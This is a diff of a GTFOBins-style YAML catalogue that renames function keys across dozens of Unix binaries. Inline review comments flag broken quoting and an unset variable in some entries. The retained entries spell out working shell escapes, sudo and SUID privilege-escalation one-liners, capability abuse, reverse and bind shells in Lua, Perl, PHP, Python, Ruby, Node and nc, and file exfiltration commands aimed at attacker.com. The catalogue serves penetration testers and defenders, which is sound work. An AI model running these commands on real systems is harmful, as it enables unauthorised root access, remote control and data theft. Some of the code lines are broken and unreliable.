@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: lua -e 'os.execute("/bin/sh")'
|
||||
reverse-shell-non-interactive:
|
||||
non-interactive-reverse-shell:
|
||||
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -15,7 +15,7 @@ functions:
|
||||
local b=assert(f:read("*a"));t:send(b);
|
||||
end;
|
||||
f:close();t:close();'
|
||||
bind-shell-non-interactive:
|
||||
non-interactive-bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
@ -26,7 +26,7 @@ functions:
|
||||
local r,x=c:receive();local f=assert(io.popen(r,"r"));
|
||||
local b=assert(f:read("*a"));c:send(b);
|
||||
end;c:close();f:close();'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -41,7 +41,7 @@ functions:
|
||||
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
|
||||
t:send(d);
|
||||
t:close();'
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
|
||||
< "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed.
|
||||
code: |
|
||||
@ -59,8 +59,8 @@ functions:
|
||||
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
||||
file-read:
|
||||
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo lua -e 'os.execute("/bin/sh")'
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: ./lua -e 'os.execute("/bin/sh")'
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
mail -f $TF
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
@ -10,11 +10,11 @@ functions:
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,DATA)" .
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
|
@ -1,16 +1,16 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: man file_to_read
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: |
|
||||
./man man
|
||||
!/bin/sh
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: more file_to_read
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./more file_to_read
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
|
||||
code: |
|
||||
sudo mount -o bind /bin/sh /bin/mount
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
|
||||
functions:
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
echo "DATA" > $TF
|
||||
./mv $TF $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
|
@ -1,10 +1,10 @@
|
||||
---
|
||||
description: A valid MySQL server must be available.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: mysql -e '\! /bin/sh'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo mysql -e '\! /bin/sh'
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: ./mysql -e '\! /bin/sh'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh' > $TF
|
||||
@ -14,14 +14,14 @@ functions:
|
||||
^O
|
||||
file-read:
|
||||
- code: nano file_to_read
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh -p' > $TF
|
||||
chmod +x $TF
|
||||
./nano -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh' > $TF
|
||||
|
@ -1,36 +1,36 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell-interactive:
|
||||
bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
|
||||
code: |
|
||||
LPORT=12345
|
||||
nc -l -p $LPORT -e /bin/sh
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=file_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
sudo nc -e /bin/sh $RHOST $RPORT
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: nice /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./nice /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo nice /bin/sh
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nl -bn -w1 -s '' $LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nl -bn -w1 -s '' $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo nl -bn -w1 -s '' $LFILE
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
nmap --script=$TF
|
||||
reverse-shell-non-interactive:
|
||||
non-interactive-reverse-shell:
|
||||
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -21,7 +21,7 @@ functions:
|
||||
end;
|
||||
f:close();t:close();' > $TF
|
||||
nmap --script=$TF
|
||||
bind-shell-non-interactive:
|
||||
non-interactive-bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
@ -34,7 +34,7 @@ functions:
|
||||
local b=assert(f:read("*a"));c:send(b);
|
||||
end;c:close();f:close();' > $TF
|
||||
nmap --script=$TF
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -50,7 +50,7 @@ functions:
|
||||
t:send(d);
|
||||
t:close();' > $TF
|
||||
nmap --script=$TF
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
|
||||
< "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
@ -76,13 +76,13 @@ functions:
|
||||
TF=$(mktemp)
|
||||
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
|
||||
nmap --script=$TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
sudo nmap --script=$TF
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
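Review bot: The `file-read` entry's script line in the `@ -76,13` hunk, `echo 'lua -e 'local f=io.open("file_to_read", "rb"); ...' > $TF`, has unbalanced single quotes and a stray `lua -e` prefix: the shell closes the first string after `lua -e `, splits the rest at the first `;`, and leaves the final quote unterminated, so nothing usable is written to `$TF`. `nmap --script` loads a Lua file directly, so the line should take the same form as the neighbouring entries, `echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF`. The `file-read:` key this belongs to sits above the hunk start, so the entry's placement is inferred from the surrounding lines.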
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -14,7 +14,7 @@ functions:
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
bind-shell-interactive:
|
||||
bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
@ -24,13 +24,13 @@ functions:
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
}).listen(process.env.LPORT);'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: |
|
||||
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
od -An -c -w9999 "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./od -An -c -w9999 "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo od -An -c -w9999 "$LFILE"
|
||||
|
@ -1,17 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
pg /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: pg file_to_read
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo pg /etc/profile
|
||||
!/bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./pg file_to_read
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'system(getenv("CMD"));'
|
||||
@ -16,37 +16,37 @@ functions:
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- code: |
|
||||
export CMD="id"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "system('$CMD');"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
sudo php -r "system('$CMD');"
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "posix_setuid(0); system('$CMD');"
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh' > $TF
|
||||
@ -14,14 +14,14 @@ functions:
|
||||
^O
|
||||
file-read:
|
||||
- code: pico file_to_read
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh -p' > $TF
|
||||
chmod +x $TF
|
||||
./pico -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh' > $TF
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
pip install $TF
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -16,7 +16,7 @@ functions:
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")' > $TF/setup.py
|
||||
pip install $TF
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
@ -36,7 +36,7 @@ functions:
|
||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
||||
pip install $TF
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request. It needs an absolute local file path.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
@ -60,12 +60,12 @@ functions:
|
||||
TF=$(mktemp -d)
|
||||
echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py
|
||||
pip install $TF
|
||||
load-library:
|
||||
library-load:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
||||
pip install $TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
||||
file-write:
|
||||
@ -13,7 +13,7 @@ functions:
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
puppet filebucket -l diff /dev/null $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
description: The payloads are compatible with both Python version 2 and 3.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: python -c 'import os; os.system("/bin/sh")'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -12,7 +12,7 @@ functions:
|
||||
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
@ -28,7 +28,7 @@ functions:
|
||||
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
@ -41,12 +41,12 @@ functions:
|
||||
- code: python -c 'open("file_to_write","w+").write("DATA")'
|
||||
file-read:
|
||||
- code: python -c 'print(open("file_to_read").read())'
|
||||
load-library:
|
||||
library-load:
|
||||
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo python -c 'import os; os.system("/bin/sh")'
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
||||
---
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: rlwrap /bin/sh
|
||||
file-write:
|
||||
- description: This adds timestamps to the output file. This relies on the external `echo` command.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
rlwrap -l "$LFILE" echo DATA
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./rlwrap -H /dev/null /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo rlwrap /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
---
|
||||
|
@ -1,19 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -25,10 +25,10 @@ functions:
|
||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
|
||||
file-read:
|
||||
- code: ruby -e 'puts File.read("file_to_read")'
|
||||
load-library:
|
||||
library-load:
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
|
||||
---
|
||||
|
@ -1,30 +1,30 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'sh 0<&2 1>&2' > $TF
|
||||
chmod +x "$TF"
|
||||
scp -S $TF x y:
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_get
|
||||
LFILE=file_to_save
|
||||
scp $RPATH $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'sh 0<&2 1>&2' > $TF
|
||||
chmod +x "$TF"
|
||||
sudo scp -S $TF x y:
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'sh 0<&2 1>&2' > $TF
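Review bot: The `file-upload` entry assigns `LPATH=file_to_send` but the command on the following line reads `scp $LFILE $RPATH`, so `$LFILE` is never set and the example does not refer to the file it just named. Either the assignment or the reference should be renamed; since the `file-download` entry directly below uses `LFILE`, changing the assignment to `LFILE=file_to_send` keeps the two entries consistent. The `limited-suid` entry at the bottom continues past the end of the hunk.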
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: sed -n '1e exec sh 1>&0' /etc/hosts
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- description: GNU version only.
|
||||
code: sed -n "1e id" /etc/hosts
|
||||
file-write:
|
||||
@ -14,11 +14,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sed '' "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sed -e '' "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
|
||||
---
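Review bot: The `sudo` entry's command, `sudo sed -n '1e exec sh 1>&0 /etc/hosts`, is missing the closing single quote that the equivalent `shell` entry at the top of the file has (`sed -n '1e exec sh 1>&0' /etc/hosts`), so as written it is an unterminated string. It should read `sudo sed -n '1e exec sh 1>&0' /etc/hosts`. The renamed `sudo:` key is fine; the defect is in the unchanged code line beneath it.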
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./setarch $(arch) /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo setarch $(arch) /bin/sh
|
||||
---
|
||||
|
@ -1,23 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sftp $HOST
|
||||
!/bin/sh
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
put file_to_send file_to_save
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
get file_to_get file_to_save
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sudo sftp $HOST
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
shuf -e DATA -o "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
./shuf -e DATA -o "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sudo shuf -e DATA -o "$LFILE"
|
||||
|
